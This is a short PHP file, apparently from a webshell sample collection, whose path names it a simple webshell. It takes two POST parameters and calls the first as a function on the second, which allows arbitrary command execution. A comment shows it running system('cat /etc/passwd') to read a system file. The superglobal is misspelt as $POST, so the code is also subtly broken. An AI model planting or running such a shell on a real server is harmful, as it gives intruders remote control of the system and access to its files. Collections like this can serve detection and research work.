webshell/php/simple_2022_08_15.php

6 lines
90 B
PHP

<?php
$_=$POST['1'];
$__=$POST['2'];
// running -> system('cat /etc/passwd');
$_($__);
?>